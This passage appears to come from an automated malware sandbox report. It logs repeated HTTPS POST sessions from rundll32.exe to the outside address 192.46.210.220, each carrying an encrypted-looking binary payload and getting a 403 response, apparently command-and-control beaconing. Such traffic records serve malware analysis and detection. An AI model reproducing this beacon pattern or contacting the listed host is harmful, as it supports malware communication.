                                                                                                      2021-10-28 02:55:24 UTC326OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:25 UTC335INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      67192.168.2.350078192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:25 UTC331OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:25 UTC331OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:25 UTC335INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      68192.168.2.350084192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:28 UTC336OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:28 UTC336OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:29 UTC345INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      69192.168.2.350086192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:29 UTC340OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:29 UTC340OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:29 UTC345INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.349767192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:25 UTC34OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:25 UTC34OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:26 UTC39INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:26 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      70192.168.2.350092192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:32 UTC345OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:32 UTC346OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:33 UTC355INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:33 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      71192.168.2.350094192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:33 UTC350OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:33 UTC350OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:33 UTC355INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:33 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      72192.168.2.350100192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:36 UTC355OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:36 UTC355OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:36 UTC365INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      73192.168.2.350102192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:36 UTC360OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:36 UTC360OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:37 UTC365INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      74192.168.2.350108192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:42 UTC365OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:42 UTC365OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:42 UTC375INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:42 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      75192.168.2.350110192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:42 UTC370OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:42 UTC370OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:43 UTC375INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      76192.168.2.350117192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:45 UTC375OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:45 UTC375OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:46 UTC385INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      77192.168.2.350118192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:46 UTC380OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:46 UTC380OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:46 UTC385INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      78192.168.2.350125192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:49 UTC385OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
